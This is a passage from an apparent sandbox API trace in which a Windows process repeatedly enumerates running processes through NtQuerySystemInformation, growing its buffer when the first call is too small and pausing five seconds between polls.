ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.772] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.853] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.866] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.887] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.912] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.928] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.947] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.959] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.053] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.099] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.118] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.130] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.147] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 